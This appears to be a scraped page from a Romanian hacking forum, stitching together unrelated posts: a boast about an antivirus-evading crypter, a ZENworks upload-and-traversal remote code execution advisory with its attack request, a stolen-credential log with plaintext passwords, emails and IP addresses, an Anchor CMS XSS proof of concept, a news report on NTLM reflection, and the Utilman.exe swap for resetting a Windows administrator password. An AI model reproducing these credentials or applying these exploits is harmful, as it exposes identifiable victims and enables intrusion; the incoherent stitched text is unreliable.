Crypter~RST by dang3r1988[100% FUD - 0/35 AVS] Create Vb CRYPTER FUNCTIONAL S.O XP sp1 OK XP sp2 OK XP sp3 OK Vista x86 OK Vista x64 OK Windows 7 X86 OK Windows 7 x64 OK Windows 8 X86 OK Windows 8 x64 OK Windows 10 X86 OK Windows 10 x64 OK Scan:::... Am zis ca nu va mai prezint nimic din ceea ce stiu eu!! dar avand in vedere comentarile voastre si o sa va mai arat ca ,eu am cunostinte in IT si nu vorbesc baliverne ca voi, care inca va mai uitati la desene animate si stiti doar sa stati pe facebook si sa comentati inutil in nestinta de cauza ,,UNI,,Si nu o sa va dau link de download sa va bateti voi joc de nunca mea si nici nu cred ca va trebuie crypter meu??? ca voi stiti sa va faceti singuri dupa cum comentati:))1+1=5:))

Crypter?RST by dang3r1988[100% FUD - 0/35 AVS] Create Vb CRYPTER FUNCTIONAL S.O XP sp1 OK XP sp2 OK XP sp3 OK Vista x86 OK Vista x64 OK Windows 7 X86 OK Windows 7 x64 OK Windows 8 X86 OK Windows 8 x64 OK Windows 10 X86 OK Windows 10 x64 OK Scan:::... Am zis ca nu va mai prezint nimic din ceea ce stiu eu!! dar avand in vedere comentarile voastre si o sa va mai arat ca ,eu am cunostinte in IT si nu vorbesc baliverne ca voi, care inca va mai uitati la desene animate si stiti doar sa stati pe facebook si sa comentati inutil in nestinta de cauza ,,UNI,,Si nu o sa va dau link de download sa va bateti voi joc de nunca mea si nici nu cred ca va trebuie crypter meu??? ca voi stiti sa va faceti singuri dupa cum comentati:))1+1=5:))

>> Remote code execution in Novell ZENworks Configuration Management 11.3.1 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 07/04/2015 / Last updated: 07/04/2015 >> Background on the affected product: "Automate and accelerate your Windows 7 migration Microsoft estimates that it can take more than 20 hours to migrate a single machine to Windows 7. Novell ZENworks Configuration Management is ready to dramatically accelerate and automate every aspect of your Windows 7 migration efforts. Boost user productivity Use Novell ZENworks Configuration Management to make sure users always have access to the resources they need regardless of where they work or what devices they use. Eliminate IT effort Automatically enforce policies and dynamically manage resources with identity-based management of users as well as devices. Expand your freedom to choose Manage the lifecycles of all your current and future assets, with full support for Windows and Linux systems, Novell eDirectory, Active Directory, and more. Simplify deployment with virtual appliances Slash deployment times with a convenient virtual appliance deployment option. Enjoy a truly unified solution Centralize the management of all your devices into a single, unified and easy-to-use web-based ZENworks consoleâcalled ZENworks Control Center." This vulnerability is present in ZENworks Configuration Management (ZCM) which is part of the ZENworks Suite. A blast from the past? This is a similar vulnerability to ZDI-10-078 / OSVDB-63412, but it abuses a different parameter of the same servlet. However this time Novell: - Did not bother issuing a security advisory to their customers. - Did not credit me even though I did responsible disclosure. - Refused to provide a CVE number for months. - Did not update their ZENworks Suite Trial software with the fix (you can download it now from their site, install and test the PoC / Metasploit module). - Does not list the fix in the ZCM 11.3.2 update information (https://www.novell.com/support/kb/doc.php?id=7015776). >> Technical details: Vulnerability: Remote code execution via file upload and directory traversal CVE-2015-0779 Constraints: none; no authentication or any other information needed Affected versions: ZENworks Configuration Management 11.3.1 and below POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war <WAR file payload in the body> The WAR file will be automatically deployed to the server (on certain Windows and Linux installations the path can be "../webapps/"). A Metasploit module that exploits this vulnerability has been released. >> Fix: Upgrade to version ZENworks Configuration Management 11.3.2. [1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt [2]: https://github.com/rapid7/metasploit-framework/pull/5096 Source: http://packetstorm.wowhacker.com/1504-exploits/zenworks-exectraversal.txt

Serial Number Microsoft Windows XP Professional 76487-340-1347292-22482 CUCKOO12-1 62.141.65.92 2015-04-08 04:06:55 Serial Number Microsoft Windows XP Professional 76487-340-1347292-22482 CUCKOO05-1 62.141.65.92 2015-04-08 03:30:33 Steam Username skrillex_971 - DBS--PC 92.85.192.148 2015-04-07 19:14:50 Serial Number Microsoft Windows 7 Ultimate 00426-292-0000007-85404 DBS--PC 92.85.192.148 2015-04-07 19:14:49 Yahoo ETS dancs_robert14 eJxjZGBguNAz9z6j6EXBniqGA/6Hpr9mBIoxzjvb6i082WG+o3vLHcubG4BCDEwggkEgDSTNwKAApF5Pqpz9pnVZxj0ZuWUn9m60/XAmMTXgGjf37+RO+5MdDQtB6vkaIFpB6lfM3DpPx/6U7U6mo9L80WwN675PtuHYsEosk2tp5Z2Xsv0BQDX+hk+DtWdP+tlp2Jetz3eJ3e9R/5y5uzymcB8QrghU/JG3dWJia5xh7tRT/ycqH1n0baLH5k8 DBS--PC 92.85.192.148 2015-04-07 19:14:49 89.40.105.202 dbs testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:49 89.40.105.202 dbs testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:48 89.40.105.202 dbs testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:48 89.40.105.202 dbs testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:48 89.40.105.202 vuser801 testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:48 Login - GameTracker.rs dBsRTCTF testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:48 https://client.toolz.ro/clientarea.php dancs_robert15@yahoo.com testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:47 https://www.facebook.com/login.php rabocskai_lorand_fcbarca@yahoo.com timeailoveyou DBS--PC 92.85.192.148 2015-04-07 19:14:47 Registracija - GameTracker.rs dancs_robert14@yahoo.com testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:47 http://hqh.ro/gamecp/ dbs 2NJ9yw6o4b DBS--PC 92.85.192.148 2015-04-07 19:14:47 http://www.mix.freakz.ro/forum/eula-accepted-register.html dancs_robert14@yahoo.com testa1997 DBS--PC 92.85.192.148 2015-04-07 19:14:47 https://login.skype.com/login dancs_robert14 adrenaline123 DBS--PC 92.85.192.148 2015-04-07 19:14:46 https://id.apple.com/IDMSEmailVetting/vetemail.html dancs_robert14@yahoo.com ADrenaline123 DBS--PC 92.85.192.148 2015-04-07 19:14:46 http://forum.b-zone.ro/index.php rt_ctf_server@yahoo.com adrenaline DBS--PC 92.85.192.148 2015-04-07 19:14:46 http://www.linuxclub.ro/ dBs- testa1997

Am descarcat un activator si acuma nu mai porneste sistemul de operare deloc, imi apare doar animatia de la Dell si mi se da restart una dupa alta. Cum rezolv ? Nu am Cd cu alt windows deocamdata .. Multumesc!

Sursa Reverse Engineering and Modifying Windows 8 apps

juan@hotmail.com:juan Captured Keys: <------------> Renewal Date: December 24 2014 Use On: Windows OSX iOS Android

A default setting in both Windows 7 and 8.1 could allow local users to elevate privileges and in some situations, escape application sandboxes. The issue, something that leaves all current Windows client installations vulnerable, lies in the way the operating system handles authentication. In some instances it could be possible for a user to use a reflection attack in NT LAN Manager, a collection of security protocols found in Windows systems, to leverage WebDAV (Web Distributed Authoring and Versioning) and carry out an attack. “It’s possible to abuse cross-protocol NTLM reflection to attack the local SMB server by forcing a local system process to access a WebDAV UNC path,” warned James Forshaw, the Google Project Zero security researcher who found the issue, on Monday. Forshaw discovered the issue last year and reported it to Microsoft’s Security Response Center on Dec. 18 but the time that Project Zero gives to vendors to fix bugs – 90 days – elapsed last week, so the Google Security Research post and its proof of concept were opened to the public. According to Microsoft however the issue doesn’t merit a fix as the company has implemented mitigations for it, like Extended Protection for Authentication, in the past. According to Forshaw’s disclosure timeline, the company informed him in January that undoing the mitigations could cause “application compatibility concerns.” When reached Wednesday a Microsoft spokesperson confirmed that users should implement EPA to avoid reflection attacks using the NTLM as a vector. “Extended Protection for Authentication (EPA) is a security feature built-in to Windows 8 and 8.1, and available for older versions of Windows via knowledge base article 2345886, that helps protect our customers against this technique. We encourage customers to follow the guidance outlined in the article to enable EPA, which is off by default as it may cause some application compatibility concerns.” As EPA doesn’t come enabled by default however, Forshaw is stressing that users looking to avoid reflection attacks follow a different set of precautions, including enabling SMB signing or enabling SMB Server SPN verification. Forshaw points out that users can also disable their Webclient service, something that would make it trickier to elevate to the local system, but that this wouldn’t prevent attacks like sandbox escapes, which require user level permissions. It also might be possible to stage the exploit in another fashion, including via a DCE/RPC call. As Forshaw acknowledges in his write-up, this is far from a new issue for Microsoft – the company actually addressed a similar issue way back in 2008 (MS08-068) that could have let attackers use NTLM to mirror authentication from one machine back to the same machines. The patch disallowed NTLM sessions in flight but failed to address cross-protocol attacks like the one Project Zero found. Source

#Affected Vendor: http://anchorcms.com/ #Date: 23/03/2015 #Discovered by: JoeV #Type of vulnerability: XSS #Tested on: Windows 7 #Version: 0.9.2 #Description: Anchor CMS v 0.9.2 is susceptible to Cross Site Scripting attack. Proof of Concept (PoC): --------------------------- *XSS* --- POST /anchor/index.php/admin/pages/add HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 1003 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4w4M5e7r1tBwc2wp Referer: http://localhost/anchor/index.php/admin/pages/add Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: anchor-install-timezone=-330; anchorcms-install=kIlKh79lcE6sWxZBwoSMI2eN4LuqpHgK; anchorcms-install_payload=ZDYyYjliOTEyMzhlNjJjYmVjZTg0ZmFkNmMxMGRlMDRhOjM6e3M6NDoiX291dCI7YTowOnt9czozOiJfaW4iO2E6MDp7fXM6ODoiaHRhY2Nlc3MiO3M6Mzg4OiJPcHRpb25zIC1pbmRleGVzCgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KCVJld3JpdGVFbmdpbmUgT24KCVJld3JpdGVCYXNlIC9hbmNob3IKCgkjIEFsbG93IGFueSBmaWxlcyBvciBkaXJlY3RvcmllcyB0aGF0IGV4aXN0IHRvIGJlIGRpc3BsYXllZCBkaXJlY3RseQoJUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKCVJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kCgoJIyBSZXdyaXRlIGFsbCBvdGhlciBVUkxzIHRvIGluZGV4LnBocC9VUkwKCVJld3JpdGVSdWxlIF4oLiopJCBpbmRleC5waHAvJDEgW0xdCjwvSWZNb2R1bGU%2BCgo8SWZNb2R1bGUgIW1vZF9yZXdyaXRlLmM%2BCglFcnJvckRvY3VtZW50IDQwNCBpbmRleC5waHAKPC9JZk1vZHVsZT4KIjt9; anchorcms=u8h0s9Vjh9LUAM56y7TDWBFolw8tJxxC ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="token" 286db1269c0e304c7e435bf10251f950 ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="title" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="redirect" ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="content" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="name" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="slug" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="status" published ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="parent" 1 ------WebKitFormBoundary4w4M5e7r1tBwc2wp-- -- Regards, *Joel V* Source

1) Boot from the Windows Server 2012 ISO 2) At Windows Setup menu, click Next 3) Chose Repair your computer 4) On Choose and option click Troubleshoot 5) Under Advanced options click Command Prompt Now on command prompt, run commands: d: cd windows\system32 ren Utilman.exe Utilman.exe.old copy cmd.exe Utilman.exe 6) Close command prompt and click “Continue”. 7) Server will now boot and present the logon screen. Here press Windows Key + U 8) In prompt you can now change the password typing the command: net user administrator Password This will set the password for Administrator to Password (case sensitive) Close CMD and you should be able to log back onto the server using the password you have provided in the last step. Author: razvan1@hy